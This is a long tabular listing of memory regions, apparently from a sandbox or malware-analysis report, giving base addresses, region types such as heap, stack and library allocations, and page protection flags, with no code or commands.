7FFEB8CB0000
trusted library allocation
page execute and read and write
1B74B000
heap
page read and write
213C000
trusted library allocation
page read and write
4C00000
trusted library allocation
page read and write
7FFEB889C000
trusted library allocation
page execute and read and write
1BDCD000
heap
page read and write
EAE000
stack
page read and write
CF60F7E000
unkown
page readonly
24F946A4000
heap
page read and write
7FFEB8A76000
trusted library allocation
page read and write
CF6237E000
unkown
page readonly
1E70000
heap
page read and write
1F8A4E7F000
heap
page read and write
24F94660000
heap
page read and write
1BEB5000
heap
page read and write
7FFEB8813000
trusted library allocation
page read and write
1AFDD000
stack
page read and write
7FFEB8A50000
trusted library allocation
page read and write
780000
unkown
page readonly
9CD3EFE000
stack
page read and write
227BD080000
trusted library allocation
page read and write
7FFEB8810000
trusted library allocation
page read and write
227B8ED8000
heap
page read and write
1F8A4CB0000
heap
page read and write
1B82E000
stack
page read and write
9CD3DFE000
unkown
page readonly
1700000
heap
page read and write
22170400000
heap
page read and write
227B8EF4000
heap
page read and write
2C44000
trusted library allocation
page read and write
227B8E69000
heap
page read and write
13D8000
heap
page read and write
7FFEB8A00000
trusted library allocation
page read and write
1BC9F000
stack
page read and write
781000
stack
page read and write
267EC402000
trusted library allocation
page read and write
212A16D5000
heap
page read and write
10F1000
stack
page read and write
7FFEB8995000
trusted library allocation
page read and write
212A347B000
trusted library allocation
page read and write
28C0000
unkown
page readonly
43E6000
trusted library allocation
page read and write
17F97A18000
heap
page read and write
267EA840000
heap
page read and write
7FFEB8A30000
trusted library allocation
page read and write
212BD747000
heap
page read and write
212BD560000
heap
page read and write
24F9466D000
heap
page read and write
CE9000
heap
page read and write
227B8EE8000
heap
page read and write
2E80000
trusted library allocation
page read and write
7FFEB8B50000
trusted library allocation
page read and write
1F8A4E60000
heap
page read and write
DD5000
heap
page read and write
227B8100000
heap
page read and write
7FFEB89DE000
trusted library allocation
page read and write
1C90E000
stack
page read and write
227B8F4D000
heap
page read and write
7FFEB89A3000
trusted library allocation
page read and write
1B455000
heap
page read and write
1B6B6000
heap
page read and write
212BC115000
heap
page read and write
24F94649000
heap
page read and write
24F94702000
heap
page read and write
F43A9FE000
unkown
page readonly
227B78BA000
heap
page read and write
7FFEB89D8000
trusted library allocation
page read and write
22170370000
heap
page read and write
212BB95F000
heap
page read and write
212BEFF0000
heap
page read and write
34EE000
stack
page read and write
227B8F40000
heap
page read and write
1410000
trusted library allocation
page read and write
18D1F8E000
stack
page read and write
25B000
unkown
page readonly
212A397A000
trusted library allocation
page read and write
7FFEB8A60000
trusted library allocation
page read and write
F10000
heap
page read and write
5402000
unkown
page readonly
106E000
stack
page read and write
1BDC3000
heap
page read and write
AB2377F000
stack
page read and write
12CD000
heap
page read and write
7FFEB8A40000
trusted library allocation
page read and write
A00000
heap
page read and write
7FFEB89C0000
trusted library allocation
page read and write
9CD37FE000
unkown
page readonly
9D0000
heap
page read and write
7FFEB8B90000
trusted library allocation
page read and write
7FFEB881D000
trusted library allocation
page execute and read and write
7FFEB8B30000
trusted library allocation
page read and write
212A329D000
trusted library allocation
page read and write
212BB9A2000
heap
page read and write
227B78D0000
heap
page read and write
CF61EFE000
stack
page read and write
227BD150000
remote allocation
page read and write
124E000
stack
page read and write
C90000
heap
page read and write
7FFEB882B000
trusted library allocation
page execute and read and write
DC0000
heap
page read and write
212B32BC000
trusted library allocation
page read and write
212BBF90000
heap
page read and write
CF619FE000
stack
page read and write
16E0000
trusted library allocation
page read and write
1C313000
heap
page execute and read and write
7F1000
unkown
page execute read
584E000
stack
page read and write
212BB972000
heap
page read and write
1BBAE000
stack
page read and write
442B000
trusted library allocation
page read and write
4C30000
trusted library allocation
page read and write
4DE0000
trusted library allocation
page read and write
7FFEB89B3000
trusted library allocation
page read and write
C53000
heap
page read and write
267EA740000
heap
page read and write
7FFEB8804000
trusted library allocation
page read and write
1B41E000
stack
page read and write
212A17C0000
heap
page read and write
1390000
heap
page read and write
7FFEB8B00000
trusted library allocation
page read and write
7FFEB8910000
trusted library allocation
page execute and read and write
227B8DC4000
trusted library allocation
page read and write
7FFEB87F3000
trusted library allocation
page execute and read and write
1C057000
heap
page read and write
7FFEB885C000
trusted library allocation
page execute and read and write
227B8DC0000
trusted library allocation
page read and write
DD0000
heap
page read and write
F43A8FE000
stack
page read and write
28F2000
unkown
page readonly
1670000
trusted library allocation
page read and write
2138000
trusted library allocation
page read and write
7FFEB88E6000
trusted library allocation
page execute and read and write
2217042B000
heap
page read and write
212B344C000
trusted library allocation
page read and write
570E000
stack
page read and write
7FFEB8C20000
trusted library allocation
page execute and read and write
212BC002000
heap
page read and write
24F94637000
heap
page read and write
212BB8E0000
heap
page read and write
10EE000
stack
page read and write
7FFEB8BB0000
trusted library allocation
page read and write
1712000
trusted library allocation
page read and write
227B8D90000
trusted library allocation
page read and write
227B811A000
heap
page read and write
F43AB7E000
stack
page read and write
1400000
trusted library allocation
page read and write
227B8E70000
heap
page read and write
142E000
stack
page read and write
4BE0000
trusted library allocation
page read and write
18D1F0C000
stack
page read and write
1BDC8000
heap
page read and write
212A1600000
trusted library allocation
page read and write
15E0000
heap
page read and write
212B3221000
trusted library allocation
page read and write
25B000
unkown
page readonly
227B8DC2000
trusted library allocation
page read and write
1A9E000
stack
page read and write
227B77F0000
heap
page read and write
1B61E000
stack
page read and write
212A1690000
heap
page read and write
212B33C3000
trusted library allocation
page read and write
7FFEB8A20000
trusted library allocation
page execute and read and write
1D1B5000
heap
page read and write
7FFEB89E0000
trusted library allocation
page read and write
1230000
heap
page read and write
212B344F000
trusted library allocation
page read and write
212A1A80000
heap
page read and write
212BEE92000
heap
page read and write
227B8EFB000
heap
page read and write
7FFEB89E8000
trusted library allocation
page read and write
CF6137E000
unkown
page readonly
F43A07B000
stack
page read and write
4429000
trusted library allocation
page read and write
7FFEB88B0000
trusted library allocation
page execute and read and write
29C0000
unkown
page readonly
7FFEB89D0000
trusted library allocation
page read and write
AB229FD000
stack
page read and write
1F8A4E00000
heap
page read and write
227B8F11000
heap
page read and write
7FFEB89E0000
trusted library allocation
page read and write
212BEEBA000
heap
page read and write
24F94673000
heap
page read and write
1722000
trusted library allocation
page read and write
12FC000
heap
page read and write
810000
unkown
page readonly
CF61BFE000
stack
page read and write
227B8DC0000
trusted library allocation
page read and write
7FFEB8B83000
trusted library allocation
page read and write
7FFEB89B6000
trusted library allocation
page read and write
2043000
trusted library allocation
page read and write
212A1677000
heap
page read and write
4BDE000
stack
page read and write
227BD0E0000
trusted library allocation
page read and write
7FFEB8A24000
trusted library allocation
page read and write
E60000
heap
page read and write
4415000
trusted library allocation
page read and write
C50000
heap
page read and write
7FFEB88BC000
trusted library allocation
page execute and read and write
AC7000
heap
page read and write
7FFEB8AD0000
trusted library allocation
page read and write
1C05B000
heap
page read and write
2FE0000
trusted library allocation
page read and write
A80000
trusted library allocation
page read and write
212BD75A000
heap
page read and write
2F28000
trusted library allocation
page read and write
7FFEB8814000
trusted library allocation
page read and write
7FFEB8A40000
trusted library allocation
page read and write
1D6E000
stack
page read and write
212BD67B000
heap
page read and write
227B8F1B000
heap
page read and write
13E0000
trusted library allocation
page read and write
AB22F7E000
stack
page read and write
E4E000
heap
page read and write
7FFEB8990000
trusted library allocation
page read and write
120E000
stack
page read and write
128E000
stack
page read and write
212A1550000
heap
page read and write
7FFEB8A10000
trusted library allocation
page read and write
24F94659000
heap
page read and write
22170490000
heap
page read and write
594B000
stack
page read and write
227B8DB0000
trusted library allocation
page read and write
1DB0000
heap
page execute and read and write
212BD56C000
heap
page read and write
138F000
stack
page read and write
1580000
heap
page read and write
CF62979000
stack
page read and write
178E000
stack
page read and write
22170430000
heap
page read and write
7FFEB8B30000
trusted library allocation
page read and write
18C8000
stack
page read and write
14BE000
stack
page read and write
7FD000
unkown
page readonly
7FFEB8A00000
trusted library allocation
page read and write
227B811A000
heap
page read and write
F6E000
stack
page read and write
1F8A4E6B000
heap
page read and write
7FFEB8A40000
trusted library allocation
page read and write
4A9F000
stack
page read and write
7FFEB89F0000
trusted library allocation
page read and write
7FFEB8A30000
trusted library allocation
page read and write
46B0000
unkown
page readonly
7FFEB8803000
trusted library allocation
page execute and read and write
7FFEB88D6000
trusted library allocation
page execute and read and write
43E2000
trusted library allocation
page read and write
7FFEB89F0000
trusted library allocation
page read and write
227B8E54000
heap
page read and write
2900000
heap
page read and write
7FFEB88C0000
trusted library allocation
page execute and read and write
1306000
heap
page read and write
1BCAE000
stack
page read and write
227B78C6000
heap
page read and write
212A1A85000
heap
page read and write
7FFEB8800000
trusted library allocation
page read and write
2084000
trusted library allocation
page read and write
212A36CC000
trusted library allocation
page read and write
580B000
stack
page read and write
1C310000
heap
page execute and read and write
212A168B000
heap
page read and write
227B7800000
heap
page read and write
212BB8FA000
heap
page read and write
1F8A4E56000
heap
page read and write
1BA90000
heap
page execute and read and write
267EA88C000
heap
page read and write
267EA872000
heap
page read and write
227B7813000
heap
page read and write
7FFEB89F0000
trusted library allocation
page read and write
9AF097E000
stack
page read and write
7FFEB88AC000
trusted library allocation
page execute and read and write
1F8A4D90000
heap
page read and write
F43AAFE000
unkown
page readonly
212BB938000
heap
page read and write
14DE000
stack
page read and write
CF620FB000
stack
page read and write
9CD36F6000
stack
page read and write
AB228FE000
stack
page read and write
AB227FB000
stack
page read and write
212A18A0000
heap
page read and write
13E3000
trusted library allocation
page execute and read and write
7FFEB899C000
trusted library allocation
page read and write
7FFEB89B0000
trusted library allocation
page read and write
1C418000
stack
page read and write
227BD100000
trusted library allocation
page read and write
212BB9AE000
heap
page read and write
7FFEB8A0B000
trusted library allocation
page read and write
7FFEB8A10000
trusted library allocation
page read and write
4630000
unkown
page readonly
7FFEB88B6000
trusted library allocation
page read and write
1B42D000
heap
page read and write
212BD651000
heap
page read and write
1BE50000
trusted library section
page read and write
267EA902000
heap
page read and write
1B3E0000
heap
page execute and read and write
3041000
trusted library allocation
page read and write
407E000
stack
page read and write
24F94650000
heap
page read and write
212A3A26000
trusted library allocation
page read and write
7FFEB880D000
trusted library allocation
page execute and read and write
7FFEB899E000
trusted library allocation
page read and write
10E5000
heap
page read and write
7FFEB8A88000
trusted library allocation
page read and write
212BEF2F000
heap
page read and write
2F91000
trusted library allocation
page read and write
33E0000
heap
page read and write
7FFEB87ED000
trusted library allocation
page execute and read and write
54BB000
stack
page read and write
22170270000
heap
page read and write
24F94600000
heap
page read and write
24F94634000
heap
page read and write
10FE000
heap
page read and write
12A57000
trusted library allocation
page read and write
CF625FE000
unkown
page readonly
1070000
heap
page read and write
DE0000
heap
page read and write
24F9465B000
heap
page read and write
60BE000
stack
page read and write
212BB8EE000
heap
page read and write
7FFEB89AB000
trusted library allocation
page read and write
227B8E7A000
heap
page read and write
7FFEB8BB0000
trusted library allocation
page read and write
30B0000
heap
page execute and read and write
212B3275000
trusted library allocation
page read and write
227BD062000
trusted library allocation
page read and write
212A1698000
heap
page read and write
CF622FE000
stack
page read and write
ADE000
heap
page read and write
1820000
heap
page read and write
227B7885000
heap
page read and write
7FFEB8B10000
trusted library allocation
page read and write
212A1880000
heap
page execute and read and write
954000
stack
page read and write
7FFEB8800000
trusted library allocation
page read and write
7FFEB8B5E000
trusted library allocation
page read and write
1430000
trusted library allocation
page read and write
212BB967000
heap
page read and write
2F87000
trusted library allocation
page read and write
212BB96B000
heap
page read and write
16F0000
trusted library allocation
page read and write
212BEF07000
heap
page read and write
212A17F0000
heap
page execute and read and write
ED5E0FE000
stack
page read and write
D96000
heap
page read and write
212BBFB4000
heap
page read and write
7FFEB8BC0000
trusted library allocation
page read and write
152E000
stack
page read and write
12CE000
stack
page read and write
2217043C000
heap
page read and write
7FFEB8A81000
trusted library allocation
page read and write
2F26000
trusted library allocation
page read and write
303E000
stack
page read and write
1D1A0000
heap
page read and write
D58000
stack
page read and write
212A3417000
trusted library allocation
page read and write
24F9464E000
heap
page read and write
24F94661000
heap
page read and write
7FFEB8820000
trusted library allocation
page read and write
7FFEB8B50000
trusted library allocation
page read and write
212BB964000
heap
page read and write
212A1890000
trusted library section
page readonly
1B5CD000
stack
page read and write
17AE000
stack
page read and write
227B8EE6000
heap
page read and write
1DA0000
heap
page execute and read and write
2EB9000
trusted library allocation
page read and write
212A1729000
heap
page read and write
24F94652000
heap
page read and write
59BE000
stack
page read and write
267EA917000
heap
page read and write
227BD000000
trusted library allocation
page read and write
10FA000
heap
page read and write
212A362E000
trusted library allocation
page read and write
227B8015000
heap
page read and write
7FFEB8B70000
trusted library allocation
page read and write
7FFEB8A91000
trusted library allocation
page read and write
267EA861000
heap
page read and write
DF6000
heap
page read and write
CF6287E000
unkown
page readonly
227B8EE0000
heap
page read and write
1F8A4E48000
heap
page read and write
9CD3CFE000
stack
page read and write
267EA7A0000
trusted library allocation
page read and write
CF61B7E000
unkown
page readonly
2E60000
unkown
page readonly
7FFEB8AC0000
trusted library allocation
page read and write
7FFEB8A10000
trusted library allocation
page read and write
1B6E6000
heap
page read and write
7FFEB8BE0000
trusted library allocation
page read and write
780000
unkown
page readonly
7FFEB8AF0000
trusted library allocation
page read and write
7FD000
unkown
page readonly
4430000
trusted library allocation
page read and write
16ED000
trusted library allocation
page execute and read and write
7FFEB8B00000
trusted library allocation
page read and write
212A16D3000
heap
page read and write
12FD000
heap
page read and write
CF6267E000
unkown
page readonly
7FFEB89A0000
trusted library allocation
page read and write
1210000
heap
page read and write
7FFEB87F2000
trusted library allocation
page read and write
9CD3AFE000
stack
page read and write
2C69000
trusted library allocation
page read and write
7FFEB89A0000
trusted library allocation
page read and write
9AF067E000
unkown
page readonly
7FFEB89CC000
trusted library allocation
page read and write
212A17B0000
heap
page read and write
7FFEB8B4E000
trusted library allocation
page read and write
22170413000
heap
page read and write
AB22AF8000
stack
page read and write
24F94668000
heap
page read and write
1BCA6000
unkown
page readonly
17F97C85000
heap
page read and write
7FFEB8BA0000
trusted library allocation
page read and write
F43B3FD000
stack
page read and write
212BEEEB000
heap
page read and write
12A5E000
trusted library allocation
page read and write
267EA866000
heap
page read and write
212BEEB6000
heap
page read and write
7FFEB8B20000
trusted library allocation
page read and write
1261000
heap
page read and write
2ED0000
heap
page read and write
7FFEB88C6000
trusted library allocation
page execute and read and write
F43AA7E000
stack
page read and write
227B77D0000
heap
page read and write
7FFEB8AC0000
trusted library allocation
page read and write
2FDE000
stack
page read and write
227B8EAE000
heap
page read and write
17F97BE0000
heap
page read and write
227B78E7000
heap
page read and write
CA9000
heap
page read and write
E2D000
stack
page read and write
7FFEB88B0000
trusted library allocation
page read and write
9CD327B000
stack
page read and write
227B8F26000
heap
page read and write
7FFEB8824000
trusted library allocation
page read and write
C70000
trusted library allocation
page read and write
7FFEB8A26000
trusted library allocation
page read and write
ED5DA7B000
stack
page read and write
4510000
trusted library allocation
page read and write
1B3E3000
heap
page execute and read and write
17F97A10000
heap
page read and write
7FFEB87F0000
trusted library allocation
page read and write
AB222F3000
stack
page read and write
A35000
heap
page read and write
7FFEB8B5A000
trusted library allocation
page read and write
7FFEB8BF0000
trusted library allocation
page read and write
2217040B000
heap
page read and write
227BD070000
trusted library allocation
page read and write
227B8D30000
trusted library allocation
page read and write
1C15D000
stack
page read and write
55BB000
stack
page read and write
43FE000
trusted library allocation
page read and write
7FFEB8A20000
trusted library allocation
page read and write
7FFEB8BD0000
trusted library allocation
page read and write
24F94C60000
trusted library allocation
page read and write
7FFEB8C10000
trusted library allocation
page read and write
7FFEB8990000
trusted library allocation
page read and write
212A30A8000
heap
page read and write
22170290000
heap
page read and write
7FFEB8AE0000
trusted library allocation
page read and write
212BBFB9000
heap
page read and write
4401000
trusted library allocation
page read and write
7FFEB8A28000
trusted library allocation
page read and write
7FFEB89E8000
trusted library allocation
page read and write
9CD40FE000
stack
page read and write
22170502000
heap
page read and write
9AF0A7E000
unkown
page readonly
24F94658000
heap
page read and write
9AF00FE000
stack
page read and write
7FFEB8A74000
trusted library allocation
page read and write
24F946A8000
heap
page read and write
267EA750000
heap
page read and write
212A3A29000
trusted library allocation
page read and write
1B420000
heap
page read and write
AB22C7E000
stack
page read and write
212BEF03000
heap
page read and write
4DDD000
stack
page read and write
F6E000
stack
page read and write
2217048E000
heap
page read and write
227B8F0D000
heap
page read and write
1D90000
trusted library allocation
page read and write
16D0000
trusted library allocation
page read and write
212A32A4000
trusted library allocation
page read and write
7FFEB89C0000
trusted library allocation
page read and write
1320000
heap
page read and write
12A71000
trusted library allocation
page read and write
7FFEB87F4000
trusted library allocation
page read and write
F43A4FE000
stack
page readonly
227B785C000
heap
page read and write
16F7000
trusted library allocation
page read and write
227BD073000
trusted library allocation
page read and write
5B00000
heap
page read and write
176F000
stack
page read and write
7FFEB88A0000
trusted library allocation
page read and write
9AF087E000
unkown
page readonly
212A3221000
trusted library allocation
page read and write
7FFEB8AE0000
trusted library allocation
page read and write
7FFEB8C10000
trusted library allocation
page execute and read and write
F43B1FD000
stack
page read and write
227B8F3C000
heap
page read and write
7FFEB8B40000
trusted library allocation
page read and write
227B7AD0000
heap
page read and write
212BEFEB000
heap
page read and write
212BEEC8000
heap
page read and write
227B8D01000
trusted library allocation
page read and write
7FFEB883C000
trusted library allocation
page execute and read and write
D32000
heap
page read and write
7FFEB89D2000
trusted library allocation
page read and write
212A3544000
trusted library allocation
page read and write
7FFEB8980000
trusted library allocation
page read and write
2F30000
heap
page read and write
7FFEB8B10000
trusted library allocation
page read and write
4440000
trusted library allocation
page read and write
227B7899000
heap
page read and write
212B3320000
trusted library allocation
page read and write
212BD6BA000
heap
page read and write
22170485000
heap
page read and write
227B8102000
heap
page read and write
227B8F43000
heap
page read and write
B28000
heap
page read and write
227B8E62000
heap
page read and write
54D0000
heap
page execute and read and write
2136000
trusted library allocation
page read and write
7FFEB8A98000
trusted library allocation
page read and write
7FFEB880D000
trusted library allocation
page execute and read and write
7FFEB89F5000
trusted library allocation
page read and write
7FFEB8A30000
trusted library allocation
page read and write
E4B000
heap
page read and write
7FFEB8AA0000
trusted library allocation
page read and write
212BB96D000
heap
page read and write
7D0000
heap
page read and write
7FFEB8BC0000
trusted library allocation
page read and write
7FFEB8AB0000
trusted library allocation
page read and write
AB2317D000
stack
page read and write
CF62FFE000
stack
page read and write
22AC000
trusted library allocation
page read and write
21A4000
trusted library allocation
page read and write
212A35EB000
trusted library allocation
page read and write
227B8E5C000
heap
page read and write
1716000
trusted library allocation
page execute and read and write
7FFEB8B5C000
trusted library allocation
page read and write
227B8F28000
heap
page read and write
267EA913000
heap
page read and write
7FFEB8BE0000
trusted library allocation
page execute and read and write
1417000
trusted library allocation
page execute and read and write
7FFEB8A60000
trusted library allocation
page read and write
212A166B000
heap
page read and write
227B78B0000
heap
page read and write
59FE000
stack
page read and write
F70000
trusted library allocation
page read and write
263000
unkown
page readonly
22170440000
heap
page read and write
10F0000
heap
page read and write
212BBDB3000
heap
page read and write
13A5000
heap
page read and write
30C1000
trusted library allocation
page read and write
AEA000
heap
page read and write
1BB02000
unkown
page readonly
7FFEB8A70000
trusted library allocation
page read and write
1B4D5000
heap
page read and write
126F000
heap
page read and write
2302000
trusted library allocation
page read and write
212A38E5000
trusted library allocation
page read and write
E50000
heap
page read and write
AB22E7E000
stack
page read and write
212A3908000
trusted library allocation
page read and write
7FFEB8A20000
trusted library allocation
page read and write
AB22B3E000
stack
page read and write
782000
unkown
page readonly
24F9465A000
heap
page read and write
24F944D0000
heap
page read and write
CF6187B000
stack
page read and write
24F945D0000
heap
page read and write
7FFEB89BF000
trusted library allocation
page read and write
22170500000
heap
page read and write
17C0000
heap
page read and write
9AF057E000
stack
page read and write
1E60000
trusted library allocation
page read and write
1C050000
heap
page read and write
212BD660000
heap
page read and write
212A18A5000
heap
page read and write
22170C02000
heap
page read and write
7FFEB88A6000
trusted library allocation
page read and write
13D0000
trusted library allocation
page read and write
9AF017E000
unkown
page readonly
14D0000
heap
page read and write
187E000
stack
page read and write
212BBDB0000
heap
page read and write
212A36C0000
trusted library allocation
page read and write
2A60000
heap
page execute and read and write
7FFEB89C0000
trusted library allocation
page read and write
ED5DEFC000
stack
page read and write
1F8A4E84000
heap
page read and write
D78000
heap
page read and write
227B7902000
heap
page read and write
212BEFB8000
heap
page read and write
9CD3BFE000
unkown
page readonly
16AC000
stack
page read and write
212BEEBC000
heap
page read and write
7FFEB8B4C000
trusted library allocation
page read and write
212A35B9000
trusted library allocation
page read and write
495E000
stack
page read and write
1BA80000
heap
page execute and read and write
AA0000
heap
page read and write
1BA0E000
stack
page read and write
227B783F000
heap
page read and write
7FFEB8A00000
trusted library allocation
page read and write
212BD69B000
heap
page read and write
5970000
trusted library allocation
page execute and read and write
2E62000
unkown
page readonly
7FFEB8A50000
trusted library allocation
page read and write
227B78AB000
heap
page read and write
212BD573000
heap
page read and write
1640000
trusted library allocation
page read and write
5960000
trusted library allocation
page read and write
F43B07E000
stack
page read and write
227B8DF0000
trusted library allocation
page read and write
5E3D000
stack
page read and write
7FFEB8803000
trusted library allocation
page read and write
AB2307F000
stack
page read and write
7FFEB881B000
trusted library allocation
page execute and read and write
4BF0000
trusted library allocation
page read and write
212BEF3B000
heap
page read and write
16E3000
trusted library allocation
page execute and read and write
D1D000
stack
page read and write
227B815A000
heap
page read and write
7FFEB89AD000
trusted library allocation
page read and write
156E000
stack
page read and write
1F8A4F02000
heap
page read and write
35C0000
heap
page read and write
7FFEB88B0000
trusted library allocation
page execute and read and write
227B7822000
heap
page read and write
34D8000
trusted library allocation
page read and write
212BD68B000
heap
page read and write
1D1B2000
heap
page read and write
227B8E65000
heap
page read and write
1F81000
trusted library allocation
page read and write
1C516000
stack
page read and write
36CF000
stack
page read and write
CF62A7E000
unkown
page readonly
CCD000
heap
page read and write
212A32A8000
trusted library allocation
page read and write
2A51000
trusted library allocation
page read and write
499E000
stack
page read and write
7FFEB8CA0000
trusted library allocation
page read and write
227B7F60000
trusted library allocation
page read and write
1F8A4E16000
heap
page read and write
212BEF7E000
heap
page read and write
ED5DFFC000
stack
page read and write
212A3477000
trusted library allocation
page read and write
4ADE000
stack
page read and write
133C000
heap
page read and write
2E30000
trusted library allocation
page read and write
212BEED1000
heap
page read and write
7FFEB89A6000
trusted library allocation
page read and write
212A1870000
heap
page read and write
AB22D7A000
stack
page read and write
CF6117E000
unkown
page readonly
1F8A4E81000
heap
page read and write
212BC005000
heap
page read and write
2BF7000
trusted library allocation
page read and write
7FFEB8A40000
trusted library allocation
page read and write
1326000
heap
page read and write
24F94644000
heap
page read and write
140A000
trusted library allocation
page execute and read and write
451A000
trusted library allocation
page read and write
212BEE90000
heap
page read and write
17A0000
trusted library allocation
page read and write
1725000
trusted library allocation
page execute and read and write
110E000
stack
page read and write
212A16DC000
heap
page read and write
7FFEB884C000
trusted library allocation
page execute and read and write
CF61F7E000
unkown
page readonly
15DE000
stack
page read and write
4C10000
trusted library allocation
page read and write
45A0000
trusted library allocation
page read and write
7FFEB8A1E000
trusted library allocation
page read and write
227BD080000
trusted library allocation
page read and write
7F0000
unkown
page readonly
166E000
stack
page read and write
12E0000
heap
page read and write
DF8000
heap
page read and write
5F3A000
stack
page read and write
1790000
trusted library allocation
page execute and read and write
7FFEB8B20000
trusted library allocation
page read and write
24F9465D000
heap
page read and write
16B0000
heap
page read and write
CF6167C000
stack
page read and write
21A8000
trusted library allocation
page read and write
9AF007E000
unkown
page readonly
166E000
stack
page read and write
7FFEB8A60000
trusted library allocation
page read and write
212BF042000
heap
page read and write
2EA0000
trusted library allocation
page read and write
212BC00E000
heap
page read and write
212A32AC000
trusted library allocation
page read and write
1D80000
trusted library allocation
page read and write
CF1000
heap
page read and write
141B000
trusted library allocation
page execute and read and write
227B8E43000
heap
page read and write
227B87A0000
trusted library section
page readonly
1365000
heap
page read and write
CF6127E000
stack
page read and write
4420000
trusted library allocation
page read and write
114E000
stack
page read and write
4DF0000
heap
page read and write
7FFEB89E5000
trusted library allocation
page read and write
212B3455000
trusted library allocation
page read and write
227B7F70000
trusted library section
page read and write
212BEF59000
heap
page read and write
13FD000
trusted library allocation
page execute and read and write
212BD142000
trusted library allocation
page read and write
CA7000
heap
page read and write
10D0000
heap
page read and write
7FFEB8810000
trusted library allocation
page read and write
227B8000000
heap
page read and write
CE3000
heap
page read and write
227B789F000
heap
page read and write
212BB220000
trusted library allocation
page read and write
CF60EFD000
stack
page read and write
212BEEF5000
heap
page read and write
45D0000
trusted library allocation
page read and write
227B8DC1000
trusted library allocation
page read and write
AA9000
heap
page read and write
7FFEB8BA0000
trusted library allocation
page read and write
4C20000
trusted library allocation
page execute and read and write
267EA87B000
heap
page read and write
7FFEB89D8000
trusted library allocation
page read and write
1B448000
heap
page read and write
28C2000
unkown
page readonly
D97000
heap
page read and write
7FFEB8A00000
trusted library allocation
page read and write
7FFEB87F3000
trusted library allocation
page execute and read and write
40C1000
trusted library allocation
page read and write
212A1722000
heap
page read and write
2F2C000
trusted library allocation
page read and write
227B8E48000
heap
page read and write
212BD6D8000
heap
page read and write
1890000
heap
page read and write
AEB000
stack
page read and write
7FFEB8C00000
trusted library allocation
page read and write
1BD40000
heap
page read and write
CF6247E000
stack
page read and write
7FFEB89A0000
trusted library allocation
page read and write
212BD120000
trusted library allocation
page read and write
131C000
heap
page read and write
227B8D60000
trusted library allocation
page read and write
4C70000
trusted library allocation
page read and write
F43A7FE000
unkown
page readonly
D2D000
heap
page read and write
1BDA5000
heap
page read and write
56BD000
stack
page read and write
212BEFDE000
heap
page read and write
CF61077000
stack
page read and write
7FFEB89E0000
trusted library allocation
page read and write
E40000
heap
page read and write
AB226FE000
stack
page read and write
7FFEB88A0000
trusted library allocation
page execute and read and write
7FFEB8A34000
trusted library allocation
page read and write
7FFEB89C0000
trusted library allocation
page read and write
18D227E000
stack
page read and write
804000
unkown
page read and write
9CD38FB000
stack
page read and write
7FFEB87F0000
trusted library allocation
page read and write
227BD0F0000
trusted library allocation
page read and write
7FFEB8B4A000
trusted library allocation
page read and write
7FFEB8A2E000
trusted library allocation
page read and write
7FFEB881D000
trusted library allocation
page execute and read and write
7FFEB87F2000
trusted library allocation
page read and write
22170428000
heap
page read and write
212A1590000
heap
page read and write
7FFEB8B60000
trusted library allocation
page read and write
7FFEB8A64000
trusted library allocation
page read and write
32E0000
heap
page read and write
7FFEB8A6B000
trusted library allocation
page read and write
7FFEB8BD0000
trusted library allocation
page read and write
7FFEB8890000
trusted library allocation
page read and write
F43A6FD000
stack
page read and write
212B3416000
trusted library allocation
page read and write
7FFEB89AC000
trusted library allocation
page read and write
7FFEB89A9000
trusted library allocation
page read and write
1720000
trusted library allocation
page read and write
F15000
heap
page read and write
1BA4E000
stack
page read and write
There are 1160 hidden memdumps, click here to show them.